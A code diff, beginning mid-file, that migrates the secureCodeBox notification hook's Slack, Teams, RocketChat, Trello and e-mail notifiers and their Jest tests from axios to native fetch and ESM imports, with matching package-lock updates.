Created at ${creationTimestamp.toString()}

@@ -104,8 +102,8 @@ A Client Error response code was returned by the server: 1
Information Disclosure - Sensitive Information in URL: 1
Strict-Transport-Security Header Not Set: 1
`, - subject: "New nmap security scan results are available!", - text: `*Scan demo-scan-1601086432* + subject: "New nmap security scan results are available!", + text: `*Scan demo-scan-1601086432* Created at ${creationTimestamp.toString()} *Findings Severity Overview*: @@ -119,8 +117,9 @@ A Client Error response code was returned by the server: 1 Information Disclosure - Sensitive Information in URL: 1 Strict-Transport-Security Header Not Set: 1 `, - to: "mail@example.com", - }); + to: "mail@example.com", + }), + ); expect(close).toHaveBeenCalled(); }); @@ -143,13 +142,14 @@ test("should send mail to recipient overwritten in scan annotation", async () => const args = new Array(); args[EMailNotifier.EMAIL_FROM] = from; - const notifier = new EMailNotifier(channel, scan, [], args); + const notifier = new EMailNotifier(channel, scan, [], args, createTransport); await notifier.sendMessage(); - expect(sendMail).toHaveBeenCalledWith({ - from: "secureCodeBox", - html: `Scan demo-scan-1601086432
+ expect(sendMail).toHaveBeenCalledWith( + expect.objectContaining({ + from: "secureCodeBox", + html: `Scan demo-scan-1601086432
Created at ${creationTimestamp.toString()}

@@ -165,8 +165,8 @@ A Client Error response code was returned by the server: 1
Information Disclosure - Sensitive Information in URL: 1
Strict-Transport-Security Header Not Set: 1
`, - subject: "New nmap security scan results are available!", - text: `*Scan demo-scan-1601086432* + subject: "New nmap security scan results are available!", + text: `*Scan demo-scan-1601086432* Created at ${creationTimestamp.toString()} *Findings Severity Overview*: @@ -180,7 +180,8 @@ A Client Error response code was returned by the server: 1 Information Disclosure - Sensitive Information in URL: 1 Strict-Transport-Security Header Not Set: 1 `, - to: "foo@example.com", - }); + to: "foo@example.com", + }), + ); expect(close).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/EMailNotifier.ts b/hooks/notification/hook/Notifiers/EMailNotifier.ts index 24da668d0f..47464d41b7 100644 --- a/hooks/notification/hook/Notifiers/EMailNotifier.ts +++ b/hooks/notification/hook/Notifiers/EMailNotifier.ts @@ -2,14 +2,31 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { createTransport } from "nodemailer"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Finding } from "../model/Finding"; +import type { Scan } from "../model/Scan"; + +import type { createTransport as createTransportType } from "nodemailer"; export class EMailNotifier extends AbstractNotifier { public static readonly SMTP_CONFIG = "SMTP_CONFIG"; public static readonly EMAIL_FROM = "EMAIL_FROM"; protected type: NotifierType.EMAIL; + protected createTransport: typeof createTransportType; + + constructor( + channel: NotificationChannel, + scan: Scan, + findings: Finding[], + args: Object, + createTransport: typeof createTransportType, + ) { + super(channel, scan, findings, args); + this.createTransport = createTransport; + } /** * Emails endPoints are not considered sensitive as they are just the receiver of the email. @@ -29,7 +46,7 @@ export class EMailNotifier extends AbstractNotifier { } protected async sendMail(message: any, smtpConfig: any) { - const transporter = createTransport(smtpConfig); + const transporter = this.createTransport(smtpConfig); try { const info = await transporter.sendMail(message); console.log(info); diff --git a/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts b/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts index 9ac91314e7..d21965aa79 100644 --- a/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/MSTeamsNotifier.test.ts @@ -3,15 +3,24 @@ // SPDX-License-Identifier: Apache-2.0 import { MSTeamsNotifier } from "./MSTeamsNotifier"; -import axios from "axios"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const TEAMS_ENDPOINT = @@ -68,10 +77,17 @@ test("Should Send Message With Findings And Severities", async () => { }; const teamsNotifier = new MSTeamsNotifier(channel, scan, [], []); - teamsNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith(TEAMS_ENDPOINT, expect.any(String), { - headers: { "Content-Type": "application/json" }, - }); + await teamsNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + TEAMS_ENDPOINT, + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + "Content-Type": "application/json" + }), + body: expect.any(String) + }) + ); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -104,8 +120,15 @@ test("Should Send Minimal Template For Empty Findings", async () => { }; const n = new MSTeamsNotifier(channel, scan, [], []); - n.sendMessage(); - expect(axios.post).toHaveBeenCalledWith(TEAMS_ENDPOINT, expect.any(String), { - headers: { "Content-Type": "application/json" }, - }); + await n.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + TEAMS_ENDPOINT, + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + "Content-Type": "application/json" + }), + body: expect.any(String) + }) + ); }); diff --git a/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts b/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts index d056d22f98..9a61935c3e 100644 --- a/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts +++ b/hooks/notification/hook/Notifiers/MSTeamsNotifier.ts @@ -2,11 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class MSTeamsNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.MS_TEAMS; diff --git a/hooks/notification/hook/Notifiers/RocketChat.ts b/hooks/notification/hook/Notifiers/RocketChat.ts index 5279f57d85..5ff190a04a 100644 --- a/hooks/notification/hook/Notifiers/RocketChat.ts +++ b/hooks/notification/hook/Notifiers/RocketChat.ts @@ -2,11 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class RocketChatNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.ROCKET_CHAT; diff --git a/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts b/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts index 18b0f5068a..a017d993c3 100644 --- a/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/RocketChatNotifier.test.ts @@ -2,17 +2,27 @@ // // SPDX-License-Identifier: Apache-2.0 -import axios from "axios"; -import { Scan } from "../model/Scan"; -import { Finding } from "../model/Finding"; -import { NotifierType } from "../NotifierType"; -import { RocketChatNotifier } from "./RocketChat"; +import { Scan } from "../model/Scan.js"; +import { NotifierType } from "../NotifierType.js"; + import { NotificationChannel } from "../model/NotificationChannel"; +import { RocketChatNotifier } from "./RocketChat"; +import { Finding } from "../model/Finding"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -90,16 +100,17 @@ test("Should Send Message With Findings And Severities", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}' + }) ); }); @@ -116,16 +127,17 @@ test("Should use channel overwrite from annotation if set", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#team-42-channel","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#team-42-channel","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world","short":false}]}]}' + }) ); }); @@ -143,15 +155,16 @@ test("Should include link back to defectdojo if set in finding", async () => { }); await rocketChatNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalledWith( + expect(global.fetch).toHaveBeenCalledWith( "https://rocketchat.example.com/api/v1/chat.postMessage", - '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world [Open in DefectDojo](https://defectdojo.example.com/finding/42)","short":false}]}]}', - { - headers: { + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ "Content-Type": "application/json", "X-Auth-Token": "foobar", "X-User-Id": "barfoo", - }, - }, + }), + body: '{"channel":"#securecodebox","text":"New Scan Results for demo-scan-1601086432","attachments":[{"fields":[{"title":"- foobar","value":"hello world [Open in DefectDojo](https://defectdojo.example.com/finding/42)","short":false}]}]}' + }) ); }); diff --git a/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts b/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts index 1067c691a0..8dd021ac8f 100644 --- a/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts @@ -2,16 +2,26 @@ // // SPDX-License-Identifier: Apache-2.0 -import { SlackAppNotifier } from "./SlackAppNotifier"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { NotifierType } from "../NotifierType"; -import { Scan } from "../model/Scan"; +import { SlackAppNotifier } from "./SlackAppNotifier.js"; +import { NotifierType } from "../NotifierType.js"; -jest.mock("axios"); +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; + +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -67,6 +77,15 @@ test("Should Send Message With Findings And Severities", async () => { }; const slackNotifier = new SlackAppNotifier(channel, scan, [], []); - slackNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await slackNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + "https://slack.com/api/chat.postMessage", + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + 'Content-Type': 'application/json', + 'Authorization': expect.any(String) + }) + }) + ); }); diff --git a/hooks/notification/hook/Notifiers/SlackAppNotifier.ts b/hooks/notification/hook/Notifiers/SlackAppNotifier.ts index 898ab3056d..4d97ae30af 100644 --- a/hooks/notification/hook/Notifiers/SlackAppNotifier.ts +++ b/hooks/notification/hook/Notifiers/SlackAppNotifier.ts @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { Finding } from "../model/Finding"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; interface SlackApiResponse { ok: boolean; @@ -50,21 +50,25 @@ export class SlackAppNotifier extends AbstractNotifier { `Sending notification to Slack Channel: ${this.slackChannel}`, ); - const { data: response } = await axios.post( + const response = await fetch( "https://slack.com/api/chat.postMessage", { - ...message, - channel: this.slackChannel, - }, - { + method: 'POST', headers: { - Authorization: `Bearer ${process.env["SLACK_APP_TOKEN"]}`, + 'Content-Type': 'application/json', + 'Authorization': `Bearer ${process.env["SLACK_APP_TOKEN"]}`, }, - }, + body: JSON.stringify({ + ...message, + channel: this.slackChannel, + }), + } ); - if (!response.ok) { - throw new Error(`Slack API Call Failed: ${response.error}`); + const responseData = await response.json() as SlackApiResponse; + + if (!responseData.ok) { + throw new Error(`Slack API Call Failed: ${responseData.error}`); } } catch (e) { console.log( diff --git a/hooks/notification/hook/Notifiers/SlackNotifier.test.ts b/hooks/notification/hook/Notifiers/SlackNotifier.test.ts index 389755a965..50b88aa097 100644 --- a/hooks/notification/hook/Notifiers/SlackNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/SlackNotifier.test.ts @@ -3,15 +3,24 @@ // SPDX-License-Identifier: Apache-2.0 import { SlackNotifier } from "./SlackNotifier"; -import axios from "axios"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -65,8 +74,8 @@ test("Should Send Message With Findings And Severities", async () => { }; const slackNotifier = new SlackNotifier(channel, scan, [], []); - slackNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await slackNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -99,6 +108,6 @@ test("Should Send Minimal Template For Empty Findings", async () => { }; const n = new SlackNotifier(channel, scan, [], []); - n.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await n.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/SlackNotifier.ts b/hooks/notification/hook/Notifiers/SlackNotifier.ts index 719a83940d..9e72adc90f 100644 --- a/hooks/notification/hook/Notifiers/SlackNotifier.ts +++ b/hooks/notification/hook/Notifiers/SlackNotifier.ts @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class SlackNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.SLACK; diff --git a/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts b/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts index b7fa5e6d2f..d0af5fa622 100644 --- a/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts @@ -3,16 +3,25 @@ // SPDX-License-Identifier: Apache-2.0 import { TrelloNotifier } from "./TrelloNotifier"; -import axios from "axios"; import { Finding } from "../model/Finding"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const finding: Finding = { @@ -79,8 +88,8 @@ test("Should Create Cards With Findings And Severities", async () => { findings.push(finding); const trelloNotifier = new TrelloNotifier(channel, scan, findings, []); - trelloNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await trelloNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -116,6 +125,6 @@ test("Should Send Minimal Template For Empty Findings", async () => { findings.push(finding); const trelloNotifier = new TrelloNotifier(channel, scan, findings, []); - trelloNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await trelloNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/TrelloNotifier.ts b/hooks/notification/hook/Notifiers/TrelloNotifier.ts index 5df06c930b..364c7538d2 100644 --- a/hooks/notification/hook/Notifiers/TrelloNotifier.ts +++ b/hooks/notification/hook/Notifiers/TrelloNotifier.ts @@ -2,13 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { matches } from "../hook"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; +import { NotifierType } from "../NotifierType.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class TrelloNotifier extends AbstractWebHookNotifier { public static readonly TRELLO_CARDS_ENDPOINT = "TRELLO_CARDS_ENDPOINT"; @@ -63,7 +62,17 @@ export class TrelloNotifier extends AbstractWebHookNotifier { protected async sendJSONPostRequest(jsonData) { try { - await axios.post(this.resolveEndPoint(), jsonData); + const response = await fetch(this.resolveEndPoint(), { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + }, + body: JSON.stringify(jsonData), + }); + + if (!response.ok) { + throw new Error(`HTTP error! Status: ${response.status}`); + } } catch (e) { console.log( `There was an Error sending the Message for the "${this.type}": "${this.channel.name}"`, @@ -73,21 +82,21 @@ export class TrelloNotifier extends AbstractWebHookNotifier { } private getTrelloKey(): string { - return process.env[TrelloNotifier.TRELLO_KEY]; + return process.env[TrelloNotifier.TRELLO_KEY] ?? ''; } private getTrelloToken(): string { - return process.env[TrelloNotifier.TRELLO_TOKEN]; + return process.env[TrelloNotifier.TRELLO_TOKEN] ?? ''; } private getTrelloList(): string { - return process.env[TrelloNotifier.TRELLO_LIST]; + return process.env[TrelloNotifier.TRELLO_LIST] ?? ''; } // If labels env not defined return empty string private getTrelloLabels(): string { if (TrelloNotifier.TRELLO_LABELS in process.env) { - return process.env[TrelloNotifier.TRELLO_LABELS]; + return process.env[TrelloNotifier.TRELLO_LABELS] ?? ''; } return ""; } @@ -95,7 +104,7 @@ export class TrelloNotifier extends AbstractWebHookNotifier { // If card pos env not defined return top private getTrelloPos(): string { if (TrelloNotifier.TRELLO_POS in process.env) { - return process.env[TrelloNotifier.TRELLO_POS]; + return process.env[TrelloNotifier.TRELLO_POS] ?? ''; } return "top"; } @@ -103,7 +112,7 @@ export class TrelloNotifier extends AbstractWebHookNotifier { // Any user defined prefix to add to the card title private getTrelloTitlePrefix(): string { if (TrelloNotifier.TRELLO_TITLE_PREFIX in process.env) { - return process.env[TrelloNotifier.TRELLO_TITLE_PREFIX]; + return process.env[TrelloNotifier.TRELLO_TITLE_PREFIX] ?? ''; } return ""; } diff --git a/hooks/notification/hook/hook.ts b/hooks/notification/hook/hook.ts index 67a4febf32..69ae29e3da 100644 --- a/hooks/notification/hook/hook.ts +++ b/hooks/notification/hook/hook.ts @@ -1,14 +1,15 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -import { isMatch } from "lodash"; -import { Finding } from "./model/Finding"; -import { NotificationChannel } from "./model/NotificationChannel"; -import { Notifier } from "./Notifier"; -import { NotifierFactory } from "./NotifierFactory"; +import { isMatch } from "lodash-es"; import { readFileSync } from "fs"; import * as jsyaml from "js-yaml"; +import { NotificationChannel } from "./model/NotificationChannel.js"; +import { NotifierFactory } from "./NotifierFactory.js"; +import { Finding } from "./model/Finding.js"; +import { Notifier } from "./Notifier.js"; + const BASE_PATH = "/home/app/config"; const CHANNEL_FILE = `${BASE_PATH}/notification-channel.yaml`; diff --git a/hooks/notification/hook/package-lock.json b/hooks/notification/hook/package-lock.json index fa743d1175..dacbc845ce 100644 --- a/hooks/notification/hook/package-lock.json +++ b/hooks/notification/hook/package-lock.json @@ -10,20 +10,20 @@ "license": "Apache-2.0", "dependencies": { "@types/js-yaml": "^4.0.2", - "axios": "^1.6.0", "js-yaml": "^4.1.0", - "lodash": "^4.17.21", + "lodash-es": "^4.17.21", "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" }, "devDependencies": { "@kubernetes/client-node": "^1.3.0", "@types/jest": "^30.0.0", - "@types/lodash": "^4.14.171", + "@types/lodash-es": "^4.17.12", "@types/mustache": "^4.1.2", "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", "@types/nunjucks": "^3.1.5", + "esbuild": "^0.25.6", "typescript": "^5.8.3" } }, @@ -52,6 +52,448 @@ "node": ">=6.9.0" } }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.6.tgz", + "integrity": "sha512-ShbM/3XxwuxjFiuVBHA+d3j5dyac0aEVVq1oluIDf71hUw0aRF59dV/efUsIwFnR6m8JNM2FjZOzmaZ8yG61kw==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.6.tgz", + "integrity": "sha512-S8ToEOVfg++AU/bHwdksHNnyLyVM+eMVAOf6yRKFitnwnbwwPNqKr3srzFRe7nzV69RQKb5DgchIX5pt3L53xg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.6.tgz", + "integrity": "sha512-hd5zdUarsK6strW+3Wxi5qWws+rJhCCbMiC9QZyzoxfk5uHRIE8T287giQxzVpEvCwuJ9Qjg6bEjcRJcgfLqoA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.6.tgz", + "integrity": "sha512-0Z7KpHSr3VBIO9A/1wcT3NTy7EB4oNC4upJ5ye3R7taCc2GUdeynSLArnon5G8scPwaU866d3H4BCrE5xLW25A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.6.tgz", + "integrity": "sha512-FFCssz3XBavjxcFxKsGy2DYK5VSvJqa6y5HXljKzhRZ87LvEi13brPrf/wdyl/BbpbMKJNOr1Sd0jtW4Ge1pAA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.6.tgz", + "integrity": "sha512-GfXs5kry/TkGM2vKqK2oyiLFygJRqKVhawu3+DOCk7OxLy/6jYkWXhlHwOoTb0WqGnWGAS7sooxbZowy+pK9Yg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.6.tgz", + "integrity": "sha512-aoLF2c3OvDn2XDTRvn8hN6DRzVVpDlj2B/F66clWd/FHLiHaG3aVZjxQX2DYphA5y/evbdGvC6Us13tvyt4pWg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.6.tgz", + "integrity": "sha512-2SkqTjTSo2dYi/jzFbU9Plt1vk0+nNg8YC8rOXXea+iA3hfNJWebKYPs3xnOUf9+ZWhKAaxnQNUf2X9LOpeiMQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.6.tgz", + "integrity": "sha512-SZHQlzvqv4Du5PrKE2faN0qlbsaW/3QQfUUc6yO2EjFcA83xnwm91UbEEVx4ApZ9Z5oG8Bxz4qPE+HFwtVcfyw==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.6.tgz", + "integrity": "sha512-b967hU0gqKd9Drsh/UuAm21Khpoh6mPBSgz8mKRq4P5mVK8bpA+hQzmm/ZwGVULSNBzKdZPQBRT3+WuVavcWsQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.6.tgz", + "integrity": "sha512-aHWdQ2AAltRkLPOsKdi3xv0mZ8fUGPdlKEjIEhxCPm5yKEThcUjHpWB1idN74lfXGnZ5SULQSgtr5Qos5B0bPw==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.6.tgz", + "integrity": "sha512-VgKCsHdXRSQ7E1+QXGdRPlQ/e08bN6WMQb27/TMfV+vPjjTImuT9PmLXupRlC90S1JeNNW5lzkAEO/McKeJ2yg==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.6.tgz", + "integrity": "sha512-WViNlpivRKT9/py3kCmkHnn44GkGXVdXfdc4drNmRl15zVQ2+D2uFwdlGh6IuK5AAnGTo2qPB1Djppj+t78rzw==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.6.tgz", + "integrity": "sha512-wyYKZ9NTdmAMb5730I38lBqVu6cKl4ZfYXIs31Baf8aoOtB4xSGi3THmDYt4BTFHk7/EcVixkOV2uZfwU3Q2Jw==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.6.tgz", + "integrity": "sha512-KZh7bAGGcrinEj4qzilJ4hqTY3Dg2U82c8bv+e1xqNqZCrCyc+TL9AUEn5WGKDzm3CfC5RODE/qc96OcbIe33w==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + 